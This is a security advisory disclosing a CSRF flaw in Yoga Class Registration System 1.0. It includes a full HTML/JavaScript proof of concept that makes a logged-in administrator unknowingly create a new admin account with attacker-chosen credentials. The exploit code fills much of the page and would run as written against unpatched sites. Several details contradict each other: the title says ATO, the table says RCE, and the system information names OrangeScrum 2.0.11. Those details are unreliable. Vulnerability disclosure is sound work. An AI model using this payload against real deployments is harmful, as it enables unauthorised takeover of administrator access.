Yoga Class Registration System 1.0 - ATO
Summary
| Name | Yoga Class Registration System 1.0 - RCE |
| Code name | |
| Product | Yoga Class Registration System |
| Affected versions | Version 1.0 |
| State | Public |
| Release date | 2023-06-23 |
Vulnerability
| Kind | Cross-site request forgery |
| Rule | |
| Remote | Yes |
| CVSSv3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N |
| CVSSv3.1 Base Score | 6.5 |
| Exploit available | Yes |
| CVE ID(s) |
Description
Yoga Class Registration System Version 1.0 allows an external attacker to elevate privileges in the application. This is possible because the application is not protected against CSRF attacks.
Vulnerability
The application is not protected against CSRF attacks, so an attacker can persuade an administrator to create a new account with administrative permissions, along with the credentials set by the attacker.
Exploitation
To exploit the vulnerability I have written the following exploit:
<!DOCTYPE html> <html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/retr02332.com\/php-ycrs\/classes\/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------426135374114296864734166274622"); xhr.withCredentials = true; var body = "-----------------------------426135374114296864734166274622\r\n" + "Content-Disposition: form-data; name=\"id\"\r\n" + "\r\n" + "\r\n" + "-----------------------------426135374114296864734166274622\r\n" + "Content-Disposition: form-data; name=\"firstname\"\r\n" + "\r\n" + "test\r\n" + "-----------------------------426135374114296864734166274622\r\n" + "Content-Disposition: form-data; name=\"middlename\"\r\n" + "\r\n" + "test\r\n" + "-----------------------------426135374114296864734166274622\r\n" + "Content-Disposition: form-data; name=\"lastname\"\r\n" + "\r\n" + "test\r\n" + "-----------------------------426135374114296864734166274622\r\n" + "Content-Disposition: form-data; name=\"username\"\r\n" + "\r\n" + "test\r\n" + "-----------------------------426135374114296864734166274622\r\n" + "Content-Disposition: form-data; name=\"password\"\r\n" + "\r\n" + "test\r\n" + "-----------------------------426135374114296864734166274622\r\n" + "Content-Disposition: form-data; name=\"type\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------426135374114296864734166274622\r\n" + "Content-Disposition: form-data; name=\"img\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\r\n" + "-----------------------------426135374114296864734166274622--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html>
Evidence of exploitation
Our security policy
We have reserved the CVE-2023-1722 to refer to these issues from now on.
System Information
-
Version: OrangeScrum 2.0.11
-
Operating System: GNU/Linux
Mitigation
There is currently no patch available for this vulnerability.
Credits
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
References
Vendor page https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
Timeline
2023-03-31
Vulnerability discovered.
2023-03-31
Vendor contacted.
2023-03-31
Vendor replied acknowledging the report.
2023-06-23
Public Disclosure.
